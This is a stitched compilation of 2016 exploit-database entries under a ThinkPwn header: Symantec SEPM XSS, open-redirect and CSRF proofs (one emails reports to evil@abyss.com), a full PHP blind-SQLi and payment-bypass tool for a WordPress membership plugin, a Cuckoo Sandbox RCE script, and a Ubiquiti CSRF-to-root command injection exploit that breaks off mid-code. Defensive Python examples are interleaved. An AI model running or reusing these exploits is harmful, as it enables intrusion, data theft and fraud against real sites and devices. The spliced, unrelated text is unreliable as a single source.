
Source: https://github.com/Cr4sh/ThinkPwn

 Lenovo ThinkPad System Management Mode arbitrary code execution exploit

***************************************************************************

For more information about this project please read the following article:

http://blog.cr4.sh/2016/06/exploring-and-exploiting-lenovo.html


This code exploits a 0-day privilege escalation vulnerability (or backdoor?) in the SystemSmmRuntimeRt UEFI driver (GUID 7C79AC8C-5E6C-4E3D-BA6F-C260EE7C172E) of Lenovo firmware. The vulnerability is present in all ThinkPad series laptops; the oldest one that I have checked is the X220 and the newest one is the T450s (with the latest firmware versions available at this moment). Running arbitrary System Management Mode code allows an attacker to disable flash write protection and infect platform firmware, disable Secure Boot, bypass Virtual Secure Mode (Credential Guard, etc.) on Windows 10 Enterprise and do other evil things.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40040.zip
            
[+] Credits: John Page aka HYP3RLINX

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/SYMANTEC-SEPM-MULTIPLE-VULNS.txt

[+] ISR: ApparitionSec


Vendor:
================
www.symantec.com


Product:
===========
SEPM
Symantec Endpoint Protection Manager and client v12.1

SEPM provides a centrally managed solution. It handles security policy
enforcement, host integrity checking (Symantec Network Access Control only),
and automated remediation over all clients. The policies functionality is
the heart of the Symantec software. Clients connect to the server to get the
latest policies, security settings, and software updates.


Vulnerability Type(s):
======================
Multiple Cross Site Scripting (XSS)
Cross Site Request Forgeries (CSRF)
Open Redirect


CVE Reference(s):
=================
CVE-2016-3652 / XSS
CVE-2016-3653 / CSRF
CVE-2016-5304 / Open Redirect


Vulnerability Details:
=====================

The management console for SEPM contains a number of security
vulnerabilities that could be used by a lower-privileged user or by
an unauthorized user to elevate privilege or gain access to unauthorized
information on the management server. Exploitation attempts of
these vulnerabilities requires access to the SEP Management console.


References:
============
https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160628_01


Exploit code(s):
===============

In this case the XSS can bypass the HttpOnly cookie protection because the
SEPM application writes and stores the session ID within various
JavaScript functions used by the application within the DOM, thereby
exposing it directly to the XSS attack.

1) createModalDialogFromURL
2) createWindowFromURL
3) createWindowFromForm
4) createIEWindowFromForm

So all we need to do is alert() any one of these functions, e.g.
alert(createModalDialogFromURL), and it will leak the session ID,
essentially throwing the HttpOnly cookie protection flag into the garbage.

e.g.

XSS PoC: defeat the HttpOnly flag and access PHPSESSID:

https://localhost:8445/Reporting/Admin/notificationpopup.php?New=1&Type=CR&height=alert%28createModalDialogFromURL%29#
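The HttpOnly bypass above is not tied to one parameter: any response that copies an HttpOnly cookie value into inline script has already defeated the flag. The following added check (example code, not from the advisory or from Symantec) parses the Set-Cookie headers of a response, collects the HttpOnly values, and reports where they reappear inside inline script blocks; the headers and the page body are constructed samples in the shape the advisory describes.

```python
import re
from http.cookies import SimpleCookie

# Constructed sample response (not a real SEPM page): the session cookie is
# HttpOnly on the wire, yet the same value is written into an inline JS
# function, which is the pattern the advisory describes.
SAMPLE_SET_COOKIE = [
    "PHPSESSID=8f3c1d2e4b5a6978a1b2c3d4e5f60718; path=/; secure; HttpOnly",
    "ui_lang=en; path=/",
]
SAMPLE_BODY = """<html><head><script type="text/javascript">
function createModalDialogFromURL(url, w, h) {
  url = url + "&PHPSESSID=8f3c1d2e4b5a6978a1b2c3d4e5f60718";
  return window.showModalDialog(url, "", "dialogWidth:" + w + "px");
}
function createWindowFromURL(url) { return window.open(url); }
</script></head><body><p>Reporting home</p></body></html>"""

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
FUNC_RE = re.compile(r"function\s+(\w+)\s*\(")


def httponly_cookies(set_cookie_headers):
    """Return {name: value} for every cookie whose Set-Cookie header has HttpOnly."""
    found = {}
    for header in set_cookie_headers:
        jar = SimpleCookie()
        jar.load(header)
        for name, morsel in jar.items():
            if morsel["httponly"]:
                found[name] = morsel.value
    return found


def enclosing_function(script, index):
    """Name of the last 'function NAME(' declared before index, or None."""
    name = None
    for m in FUNC_RE.finditer(script):
        if m.start() > index:
            break
        name = m.group(1)
    return name


def find_leaks(set_cookie_headers, body, min_len=8):
    """Report HttpOnly cookie values that reappear inside inline <script> blocks.

    Returns a sorted list of (cookie_name, enclosing_js_function_or_None).
    Values shorter than min_len are skipped to avoid accidental matches.
    """
    leaks = set()
    cookies = httponly_cookies(set_cookie_headers)
    for script_match in SCRIPT_RE.finditer(body):
        script = script_match.group(1)
        for name, value in cookies.items():
            if len(value) < min_len:
                continue
            for hit in re.finditer(re.escape(value), script):
                leaks.add((name, enclosing_function(script, hit.start())))
    return sorted(leaks, key=lambda item: (item[0], item[1] or ""))


if __name__ == "__main__":
    for cookie, func in find_leaks(SAMPLE_SET_COOKIE, SAMPLE_BODY):
        print("HttpOnly cookie %s is readable from script (in function %s)" % (cookie, func))
```

Run against real responses, the check only needs the raw Set-Cookie headers and the body; a non-empty result means the flag is cosmetic for that page.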



Open Redirect in external URL .php script:
=========================================

A reporting URL used to route generated reports externally to any
authorized URL is susceptible to an open redirect vulnerability
that could have allowed an authorized but less-privileged user to redirect
an unsuspecting privileged user to an external URL to
attempt further exploitation, e.g. phishing.


If a victim clicks on a link supplied by an attacker, e.g.

https://localhost:8445/Reporting/common/externalurl.php?url=http://hyp3rlinx.altervista.org
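The fix for an open redirect like externalurl.php?url= is to decide on the server whether the target is local or on an allowlisted host before redirecting. The validator below is an added example (not Symantec's code); the allowlist and default target are assumptions, and it covers the usual bypass shapes (scheme-relative //host, backslashes, javascript:, userinfo tricks, header injection) rather than only the plain case shown above.

```python
from urllib.parse import urlsplit

# Constructed allowlist (not from the advisory): hosts a report may be routed to.
ALLOWED_HOSTS = {"sepm.example.internal", "reports.example.internal"}
DEFAULT_TARGET = "/Reporting/"


def safe_redirect_target(url, allowed_hosts=ALLOWED_HOSTS, default=DEFAULT_TARGET):
    """Return url if it is a site-relative path or an http(s) URL on an
    allowlisted host; otherwise return the safe default."""
    if not url or any(ch in url for ch in "\r\n\x00"):
        return default                      # empty or header-injection attempt
    # Browsers treat backslashes as slashes, so normalise before parsing.
    candidate = url.replace("\\", "/")
    try:
        parts = urlsplit(candidate)
    except ValueError:                      # e.g. malformed IPv6 literal
        return default
    if parts.scheme == "" and parts.netloc == "":
        # Site-relative path: exactly one leading slash. "//host" already
        # produced a netloc above, so it never reaches this branch.
        if candidate.startswith("/") and not candidate.startswith("//"):
            return candidate
        return default
    if parts.scheme not in ("http", "https"):
        return default                      # javascript:, data:, etc.
    if parts.username is not None or parts.password is not None:
        return default                      # https://trusted.host@evil.example/
    host = (parts.hostname or "").lower()
    if host not in allowed_hosts:
        return default                      # includes trusted.host.evil.example
    return candidate


if __name__ == "__main__":
    for attempt in ["/Reporting/Reports/index.php",
                    "http://hyp3rlinx.altervista.org",
                    "//evil.example/x",
                    "https://sepm.example.internal@evil.example/",
                    "javascript:alert(1)"]:
        print("%-45s -> %s" % (attempt, safe_redirect_target(attempt)))
```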



Cross Site Request Forgery (CSRF):
==================================

Multiple Cross Site Request Forgeries exist in a couple of places within this
version of SEPM. Below is an example of sending a scheduled report to a
remote attacker's email if the currently logged-in user visits a malicious
webpage or clicks an infected link, etc.


Symantec Reporting Admin CSRF POC:

<form id="PWN" action="https://localhost:8445/Reporting/Reports/sr-save.php"
method="POST">
<input type="hidden" name="ReportName" value="HELL" />
<input type="hidden" name="Description" value="PWNED!" />
<input type="hidden" name="DisableReportSchedule" value="on" />
<input type="hidden" name="NewReport" value="Y" />
<input type="hidden" name="reporttype" value="1" />
<input type="hidden" name="FILTERNAME" value="Default" />
<input type="hidden" name="runEvery" value="1" />
<input type="hidden" name="repeat" value="weekly" />
<input type="hidden" name="datesched1" value="02%2F10%2F2016" />
<input type="hidden" name="datesched2" value="02%2F10%2F2016" />
<input type="hidden" name="filHourSchedule" value="16" />
<input type="hidden" name="Schedulehour" value="16" />
<input type="hidden" name="filMinSchedule" value="56" />
<input type="hidden" name="Scheduleminute" value="56" />
<input type="hidden" name="sysadmin" value="off" />
<input type="hidden" name="sendto" value="evil@abyss.com" />
<input type="hidden" name="updatelastrun" value="0" />
<input type="hidden" name="HISTORYCONFIG_IDX" value="" />
<input type="hidden" name="ReportPrefix" value="Y" />
<input type="hidden" name="report_idx" value="Y-0" />
<script>document.getElementById('PWN').submit()</script>
</form>


Disclosure Timeline:
============================================
Vendor Notification: February 11, 2016
Vendor Acknowledges Report: February 12, 2016
Vendor Releases Fix: June 28, 2016
June 29, 2016 : Public Disclosure


Exploitation Technique:
=======================
Remote


Severity Level(s):
====================
Cross Site Scripting
Medium
v2 6.8
AV:A/AC:M/Au:S/C:C/I:C/A:N
v3 6.7
AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

Cross Site Request Forgery
High
v2 7.0
AV:A/AC:M/Au:M/C:C/I:C/A:C
v3 7.1
AV:A/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Open Redirect
Medium
v2 4.1
AV:A/AC:L/Au:S/C:P/I:P/A:N
v3 4.1
AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx
            
<?php
/**
 * Exploit Title: Ultimate Membership Pro WordPress Plugin Exploit
 * Google Dorks: inurl:"lid=0" OR inurl:"lid=1" ...  inurl:"lid=100" "Register" "Confirm Password"
 * Exploit Author: wp0Day.com <contact@wp0day.com>
 * Vendor Homepage: http://wpindeed.com/
 * Software Link: http://codecanyon.net/item/ultimate-membership-pro-wordpress-plugin/12159253
 * Version: 3.3
 * Tested on: Debian 8, PHP 5.6.17-3
 * Type: Unauthenticated Blind SQLi, Unauthenticated Payment Bypass
 * Time line: Found [07-Jun-2016], Vendor notified [08-Jun-2016], Vendor fixed: [Yes], [RD:1466846149]
 */


require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();


$options = getopt("t:m:l:e:s:",array('tor:'));
print_r($options);
$options = validateInput($options);

if (!$options){
    showHelp();
}

if ($options['tor'] === true)
{
    echo " ### USING TOR ###\n";
    echo "Setting TOR Proxy...\n";
    $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
    $curl->addOption(CURLOPT_PROXYTYPE,7);
    echo "Checking IPv4 Address\n";
    $curl->get('https://dynamicdns.park-your-domain.com/getip');
    echo "Got IP : ".$curl->getResponse()."\n";
    echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
    $answer = fgets(fopen ("php://stdin","r"));
    if(trim($answer) != 'wololo'){
        die("Aborting!\n");
    }
    echo "OK...\n";
}

function isTrue($sql){
    global $curl, $options;
    $levels = "') union all select (SELECT CASE WHEN ($sql) then 1 else 1*(select table_name from information_schema.tables) end)#";
    $data = array(
        'action'=>'ihc_preview_user_listing',
        'shortcode'=>'[ihc-list-users filter_by_level="1" levels_in="'.$levels.'" theme="ihc-theme_1" ]'
    );
    $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
    $resp = $curl->getResponse();
    return preg_match('~ihc_public_list_users_(\d+)~',$resp);
}

function exploit(){
    global $curl, $options;

    if ($options['m'] == 'pay'){
        $level = $options['l'];
        for($i=$options['s']; $i<$options['e']; $i++){
            //This is mental, no IP or Hash check!
            echo "Paying Level $level to UserID: $i\n";
            $data = array('x_MD5_Hash'=>'1', 'x_response_code'=>'1', 'x_cust_id'=>$i, 'x_po_num'=>$level);
            $curl->post($options['t'].'wp-content/plugins/indeed-membership-pro/authorize_response.php', $data);
            //echo $curl->getResponse();
        }
    }
    if ($options['m'] == 'sql'){
        $query = $options['s'];
        echo "'Running' SQL Query: $query\n";
        echo "Getting Length";
        $max_length = 100;
        //Well, it is messed up, can't use , (comma) in the query
        //Binary search or divide et impera is possible with the BETWEEN operator
        //Code it yourself :)
        $len = 0;
        for ($i=1;$i<$max_length;$i++){
            $sql_len = "(select char_length( ($query) ) = $i )";
            if (isTrue($sql_len)){
                echo "\nLength found: $i\n";
                $len = $i;
                break;
            } else {
                echo ".";
            }
        }
        if ($len !== 0 ){
            echo "Reading char by char\nResponse:\n";
        } else {
            die("Failed getting length!\nAborting.\n\n");
        }
        $charset = 'etaoinsrhdluc@*1234567890.mfywgpbvkxqjzETAOINSRHDLUCMFYWGPBVKXQJZ';
        for ($i=1;$i<$len;$i++){
            $got = false;
            for ($j=0;$j<strlen($charset);$j++){
                $chr = $charset[$j];
                $question = "SELECT substr(($query) FROM $i FOR 1) = '$chr' ";
                if (isTrue($question)){
                    echo $charset[$j];
                    $got = true;
                    break;
                }
            }
            if (!$got){
                echo "?";
            }
        }
        echo "\n\n";

    }
}

exploit();

function validateInput($options){

    if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
        return false;
    }

    if (!isset($options['m']) || !in_array($options['m'], array('sql', 'pay') ) ){
        return false;
    }
    if ($options['m'] == 'sql' && !isset($options['s'])) {
        return false;
    }

    if ($options['m'] == 'pay' && ( !isset($options['s']) || !isset($options['e']) || !isset($options['l']))) {
        return false;
    }
    if ($options['m'] == 'pay' && ( !is_numeric($options['s']) || !is_numeric($options['e']) || !is_numeric($options['l']) )) {
        echo "In pay mode -s -e and -l must be numeric!\n";
        return false;
    }

    $options['tor'] = isset($options['tor']);

    return $options;
}


function showHelp(){
    global $argv;
    $help = <<<EOD

     Ultimate Membership Pro 8.4.1.3 WordPress Plugin Exploit


Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -m [MODE] -s [QUERY] -s [START] -e [END] -l [LEVEL]

       [MODE] sql  - Blind SQL Inject mode*
              pay  - Payment bypass. Parameters -l Level ID (&lid=XX in the url), -s Start UserID, -e End UserID

       *Note: You can't use , (comma) in the query.

Examples:
       php $argv[0] -t http://localhost/ --tor=yes -m sql -s 'select user()'
       php $argv[0] -t http://localhost/ --tor=yes -m pay -s 0 -e 1000 -l 1

       Marks all users with UserID between 0 and 1000 as paying customer for level ID 1

    Misc:
           CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
           @link http://github.com/svyatov/CurlWrapper
           @license http://www.opensource.org/licenses/mit-license.html MIT License

EOD;
    echo $help."\n\n";
    die();
}
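The payment bypass in the exploit above works because authorize_response.php acts on x_response_code without checking x_MD5_Hash, so a forged callback with x_MD5_Hash=1 is enough. The added example below (not the plugin's code, not wp0Day's) shows that vulnerable pattern beside a verifying handler that recomputes the legacy Authorize.Net relay-response hash, MD5(MD5 hash value + API login ID + transaction ID + amount), and additionally checks the amount against the level and rejects replays; the merchant settings, level prices and gateway_callback() simulation are constructed.

```python
import hashlib
import hmac

# Constructed merchant settings and level prices (not real credentials). In the
# plugin these would come from the saved Authorize.Net configuration.
MERCHANT = {"api_login_id": "exampleLogin", "md5_hash_value": "example-md5-secret"}
LEVEL_PRICES = {"1": "9.99", "2": "19.99"}


def grant_level_vulnerable(post):
    """The pattern the exploit relies on: trust x_response_code and nothing else."""
    return post.get("x_response_code") == "1"


def expected_md5_hash(md5_hash_value, api_login_id, trans_id, amount):
    """Legacy Authorize.Net relay-response hash: MD5(secret + login + trans_id + amount)."""
    raw = md5_hash_value + api_login_id + trans_id + amount
    return hashlib.md5(raw.encode("utf-8")).hexdigest().upper()


def verify_relay_response(post, merchant, level_prices, seen_trans_ids):
    """Return (granted, reason). Grant only when the gateway hash validates,
    the transaction is approved, the amount matches the requested level,
    and the transaction id has not been processed before."""
    trans_id = post.get("x_trans_id", "")
    amount = post.get("x_amount", "")
    supplied = post.get("x_MD5_Hash", "")
    level = post.get("x_po_num", "")
    if not (trans_id and amount and supplied and level and post.get("x_cust_id")):
        return False, "missing fields"
    expected = expected_md5_hash(merchant["md5_hash_value"],
                                 merchant["api_login_id"], trans_id, amount)
    if not hmac.compare_digest(supplied.upper(), expected):
        return False, "hash mismatch"               # forged or tampered callback
    if post.get("x_response_code") != "1":
        return False, "transaction not approved"
    # The hash does not cover x_po_num, so bind the paid amount to the level here.
    if level_prices.get(level) != amount:
        return False, "amount does not match level"
    if trans_id in seen_trans_ids:
        return False, "replayed transaction"
    seen_trans_ids.add(trans_id)
    return True, "ok"


def gateway_callback(level, cust_id, trans_id, amount, merchant):
    """Simulate what the gateway would POST for an approved payment (test aid)."""
    return {
        "x_response_code": "1",
        "x_cust_id": cust_id,
        "x_po_num": level,
        "x_trans_id": trans_id,
        "x_amount": amount,
        "x_MD5_Hash": expected_md5_hash(merchant["md5_hash_value"],
                                        merchant["api_login_id"], trans_id, amount),
    }


if __name__ == "__main__":
    forged = {"x_MD5_Hash": "1", "x_response_code": "1", "x_cust_id": "5", "x_po_num": "1"}
    print("vulnerable handler grants forged callback:", grant_level_vulnerable(forged))
    print("verifying handler:", verify_relay_response(forged, MERCHANT, LEVEL_PRICES, set()))
    seen = set()
    legit = gateway_callback("1", "5", "2040000001", "9.99", MERCHANT)
    print("signed callback:", verify_relay_response(legit, MERCHANT, LEVEL_PRICES, seen))
    print("same callback again:", verify_relay_response(legit, MERCHANT, LEVEL_PRICES, seen))
```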
            
# -*- coding: utf8 -*-
"""
# Exploit Title: Cuckoo Sandbox Guest XMLRPC Privileged RCE PoC
# Date: June 28th 2016
# Exploit Author: Rémi ROCHER
# Vendor Homepage: https://cuckoosandbox.org/
# Software Link: https://github.com/cuckoosandbox/cuckoo/archive/master.zip
# Version: <= 2.0.1
# Tested on: MS Windows 7, MS Windows 10 (With & without UAC)
# CVE : None

--[ NAME

Cuckoo Sandbox Guest XMLRPC Privileged RCE PoC

--[ DESCRIPTION

Cuckoo Sandbox is Free Software, basically used by researchers to analyze
(potential) malware behavior. It is also implemented industrially by
private companies for detecting potential threats within IT Networks
featuring dedicated so-called security appliances.

This basic Proof of Concept exploit spawns a calc.exe process with
Administrator privileges, assuming:
    * The Cuckoo agent.py is running with Admin privileges (should be
      the case)
    * The current user can access a local interface (should be the case)
    * Optional for true Remote Code Execution: external equipment can
      access the XMLRPC port (default 8000).

One may also call the complete() method in order to stop any further
detection or screenshot.

Such vulnerabilities can be used to either trick the very detection
system, or potentially escape the sandbox machine itself. An attacker could
also exploit such bugs as a pivot in order to attack sensitive systems.

--[ AUTHORS

* Rémi ROCHER - Armature Technologies
* Thomas MARTHÉLY - Armature Technologies

--[ RESOURCE
* Repository: https://github.com/cuckoosandbox/cuckoo


"""
import xmlrpclib
from StringIO import StringIO
from zipfile import ZipFile, ZipInfo, ZIP_STORED, ZIP_DEFLATED


def execute(x, cmd="cmd /c start"):
    output = StringIO()
    file = ZipFile(output, "w", ZIP_STORED)
    info = ZipInfo("analyzer.py")
    info.compress_type = ZIP_DEFLATED

    content = ("""
import subprocess

if __name__ == "__main__":
  subprocess.Popen("%s",stdout=subprocess.PIPE,stderr=subprocess.PIPE)

""" % cmd)
    file.writestr(info, content)
    file.close()

    data = xmlrpclib.Binary(output.getvalue())

    if x.add_analyzer(data):
        return x.execute()


if __name__ == "__main__":
    x = xmlrpclib.ServerProxy("http://localhost:8000")
    execute(x, "calc.exe")
    # x.complete() #  Blackout mode
            
<!--
KL-001-2016-002 : Ubiquiti Administration Portal CSRF to Remote Command Execution

Title: Ubiquiti Administration Portal CSRF to Remote Command Execution
Advisory ID: KL-001-2016-002
Publication Date: 2016.06.28
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-002.txt


1. Vulnerability Details

     Affected Vendor: Ubiquiti
     Affected Product: AirGateway, AirFiber, mFi
     Affected Version: 1.1.6, 3.2, 2.1.11
     Platform: Embedded Linux
     CWE Classification: CWE-352: Cross-Site Request Forgery (CSRF);
                         CWE-77: Improper Neutralization of Special Elements
                         used in a Command ('Command Injection')
     Impact: Arbitrary Code Execution
     Attack vector: HTTP

2. Vulnerability Description

     The Ubiquiti AirGateway, AirFiber and mFi platforms feature
     remote administration via an authenticated web-based portal.
     Lack of CSRF protection in the Remote Administration Portal,
     combined with unsafe passing of user input to operating system
     commands executed with root privileges, can be abused in a way
     that enables remote command execution.

3. Technical Description


     The firmware files analyzed were
     AirGWP.v1.1.6.28062.150731.1520.bin, AF24.v3.2.bin, and
     firmware.bin respectively.

     The MD5 hash values for the vulnerable files served by the
     administration portal are:

     AirGateway b45fe8e491d62251f0a7a100c636178a /usr/www/system.cgi
     AirFiber   d8926f7f65a2111f4036413f985082b9 /usr/www/system.cgi
     mFi        960e8f6e507b227dbc4b65fc7a7036bc /usr/www/system.cgi

     The firmware file contains a LZMA compressed, squashfs
     partition. The binaries running on the embedded device are
     compiled for a MIPS CPU. The device can be easily virtualized
     using QEMU:

     Example: sudo /usr/sbin/chroot . ./qemu-mips-static /usr/sbin/lighttpd
              -f /etc/lighttpd/lighttpd.conf

     The administration portal does not issue a randomized CSRF
     token either per session, page, or request.  Administration
     authorization is solely based on cookie control. Therefore,
     it is possible to embed JavaScript into an HTML page so when
     an administrator is socially engineered into visiting the page,
     the target device will be accessed with privileges.

     Device configuration POST parameters include tokens passed to
     operating system commands run as root in unsafe ways with
     insufficient input sanitization.  Command injection is possible
     by stacking shell commands in parameters such as
     iptables.1.cmd.

     To reproduce this finding, follow these steps:

     a. Authenticate to the target web application and navigate to the
        SYSTEM page.
     b. Download the current configuration.
     c. Open the configuration in an editor of your choice, navigate to the
        line containing: iptables.1.cmd=-A FIREWALL -j ACCEPT
     d. Append the following onto that line: ;touch /var/tmp/csrf-to-rce.txt
     e. Save the changes, and submit the modified configuration. Apply the
        changes using apply.cgi afterward.

        Example:

         POST /system.cgi HTTP/1.1
         Host: 192.168.1.1
         User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0)
         Gecko/20100101 Firefox/43.0
         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;
         q=0.8
         Accept-Language: en-US,en;q=0.5
         Accept-Encoding: gzip, deflate
         DNT: 1
         Referer: https://192.168.1.1/system.cgi
         Cookie: ui_language=en_US; last_check=1452020493426;
         AIROS_SESSIONID=e5f61a5c0a9d0690b4efd484e56b8c93
         Connection: keep-alive
         Content-Type: multipart/form-data;
         boundary=---------------------------4384928471732886672453075690
         Content-Length: 7204

         ...
         iptables.1.cmd=-A FIREWALL -j ACCEPT; touch /var/tmp/csrf-to-rce.txt
         ...

         GET /apply.cgi?testmode=&_=[redacted] HTTP/1.1
         Host: 192.168.1.1
         X-Requested-With: XMLHttpRequest
         Referer: https://192.168.1.1/system.cgi
         Cookie: ui_language=en_US; last_check=1452020493426;
         AIROS_SESSIONID=e5f61a5c0a9d0690b4efd484e56b8c93
         Connection: keep-alive

     f. Change your IP address, but ensure continued routing to the target web
        application. Incrementing the last octet is sufficient.
     g. Open the configuration in an editor of your choice, navigate to the
        modified line and alter it: ;touch /var/tmp/csrf-to-rce-newsrc.txt
     h. Repeat step e from the new IP address. You will receive the same
        response. Apply the changes using the apply.cgi file.
     i. Log in to the target device using SSH or telnet, navigate to /var/tmp
        and type ls.
     j. You'll discover both files exist.
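     The injection in step d succeeds because the value of iptables.1.cmd reaches a
     root shell unchanged. The added example below (not from the advisory or from
     Ubiquiti) shows the defensive side: parse such a value into an argv list that
     is handed to the iptables binary without a shell, refuse anything that is not
     a plain rule, and audit an uploaded configuration for offending keys. The
     configuration excerpt, character set and rule verbs are assumptions.

```python
import re
import subprocess

# Constructed excerpt of an AirOS-style configuration upload (not a real device
# export); the last line carries the stacked command from the advisory.
SAMPLE_CFG = """iptables.status=enabled
iptables.1.status=enabled
iptables.1.comment=
iptables.1.cmd=-A FIREWALL -j ACCEPT
iptables.2.status=enabled
iptables.2.cmd=-A FIREWALL -j ACCEPT; touch /var/tmp/csrf-to-rce.txt
"""

# Anything a shell would interpret is refused outright, quotes and backslashes
# included, so plain whitespace splitting is sufficient afterwards.
SHELL_META = set(";|&`$\n\r<>(){}'\"\\")
# Characters an iptables rule argument legitimately contains: chain names,
# addresses with masks, ports, module options, negation.
TOKEN_RE = re.compile(r"^[A-Za-z0-9_.:/,!=+-]+$")
RULE_VERBS = ("-A", "-I", "-D")
CMD_KEY_RE = re.compile(r"^iptables\.(\d+)\.cmd=(.*)$")


def parse_rule(value):
    """Turn an iptables.N.cmd value into an argv list, or None if it is not a
    plain rule. The result is meant for subprocess as a list, never a shell."""
    if not value or SHELL_META.intersection(value):
        return None
    tokens = value.split()
    if tokens[0] not in RULE_VERBS:
        return None
    if not all(TOKEN_RE.match(tok) for tok in tokens):
        return None
    return ["iptables"] + tokens


def apply_rule(value, runner=subprocess.run):
    """Apply one rule via an argv call (no shell). Raises on rejected input."""
    argv = parse_rule(value)
    if argv is None:
        raise ValueError("rejected iptables rule: %r" % value)
    return runner(argv, check=True)


def audit_config(cfg_text):
    """Return (rule_index, value) for every iptables.N.cmd that parse_rule
    refuses; an empty list means the upload contains only plain rules."""
    bad = []
    for line in cfg_text.splitlines():
        m = CMD_KEY_RE.match(line.strip())
        if m and parse_rule(m.group(2)) is None:
            bad.append((int(m.group(1)), m.group(2)))
    return bad


if __name__ == "__main__":
    for idx, value in audit_config(SAMPLE_CFG):
        print("rejecting iptables.%d.cmd: %s" % (idx, value))
    # Dry run: the fake runner just echoes the argv that would be executed.
    print(apply_rule("-A FIREWALL -s 10.0.0.0/8 -p icmp -j ACCEPT",
                     runner=lambda argv, check: argv))
```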

4. Mitigation and Remediation Recommendation

     At this time there is no vendor patch for this vulnerability.
     The vendor was unable or unwilling to communicate an expected release
     date for a proper mitigation.

5. Credit

     This vulnerability was discovered by Matt Bergin (@thatguylevel)
     of KoreLogic, Inc.

6. Disclosure Timeline

     2016.02.25 - KoreLogic sends vulnerability report and PoC to Ubiquiti.
     2016.02.26 - Ubiquiti acknowledges receipt of vulnerability report.
     2016.04.12 - 30 business days have elapsed since the vulnerability was
                  reported to Ubiquiti.
     2016.04.21 - KoreLogic asks for an update on the remediation effort.
     2016.04.29 - Ubiquiti replies that the patch will require
                  "significant changes" but does not provide an estimate
                  of the release time table.
     2016.05.04 - 45 business days have elapsed since the vulnerability was
                  reported to Ubiquiti.
     2016.05.12 - KoreLogic requests an update from Ubiquiti.
     2016.05.23 - KoreLogic requests an update from Ubiquiti.
     2016.06.23 - 80 business days have elapsed since the vulnerability was
                  reported to Ubiquiti.
     2016.06.28 - Public disclosure.

7. Proof of Concept

     ########################################################################
     #
     # Copyright 2016 KoreLogic Inc., All Rights Reserved.
     #
     # This proof of concept, having been partly or wholly developed
     # and/or sponsored by KoreLogic, Inc., is hereby released under
     # the terms and conditions set forth in the Creative Commons
     # Attribution Share-Alike 4.0 (United States) License:
     #
     #   http://creativecommons.org/licenses/by-sa/4.0/
     #
     #######################################################################

     This example has been performed against the AirGateway device running the
     1.1.6 firmware version. In order to recreate this vulnerability on
     AirFiber and mFi, the attacker should first obtain a valid copy of the
     device configuration and update this proof-of-concept code.
-->

<html>
  <body>
    <form action="https://192.168.1.1/apply.cgi" id="airos-exploit-apply">
      <input type="submit" value="Submit request" />
    </form>

    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https://192.168.1.1/system.cgi", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------761818923593135447208368355");
        xhr.withCredentials = true;
        var body = "-----------------------------761818923593135447208368355\r\n" + 
          "Content-Disposition: form-data; name=\"fwfile\"; filename=\"\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------761818923593135447208368355\r\n" + 
          "Content-Disposition: form-data; name=\"action\"\r\n" + 
          "\r\n" + 
          "fwupload\r\n" + 
          "-----------------------------761818923593135447208368355\r\n" + 
          "Content-Disposition: form-data; name=\"update_status\"\r\n" + 
          "\r\n" + 
          "enabled\r\n" + 
          "-----------------------------761818923593135447208368355\r\n" + 
          "Content-Disposition: form-data; name=\"hostname\"\r\n" + 
          "\r\n" + 
          "airGateway\r\n" + 
          "-----------------------------761818923593135447208368355\r\n" + 
          "Content-Disposition: form-data; name=\"timezone\"\r\n" + 
          "\r\n" + 
          "GMT\r\n" + 
          "-----------------------------761818923593135447208368355\r\n" + 
          "Content-Disposition: form-data; name=\"ui_language\"\r\n" + 
          "\r\n" + 
          "en_US\r\n" + 
          "-----------------------------761818923593135447208368355\r\n" + 
          "Content-Disposition: form-data; name=\"adminname\"\r\n" + 
          "\r\n" + 
          "ubnt\r\n" + 
          "-----------------------------761818923593135447208368355\r\n" + 
          "Content-Disposition: form-data; name=\"latitude\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------761818923593135447208368355\r\n" + 
          "Content-Disposition: form-data; name=\"longitude\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------761818923593135447208368355\r\n" + 
          "Content-Disposition: form-data; name=\"longitude\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------761818923593135447208368355\r\n" + 
          "Content-Disposition: form-data; name=\"cfgfile\"; filename=\"hacked.cfg\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "aaa.1.radius.acct.1.status=disabled\n" + 
          "wpasupplicant.status=disabled\n" + 
          "wpasupplicant.device.1.status=disabled\n" + 
          "wireless.status=enabled\n" + 
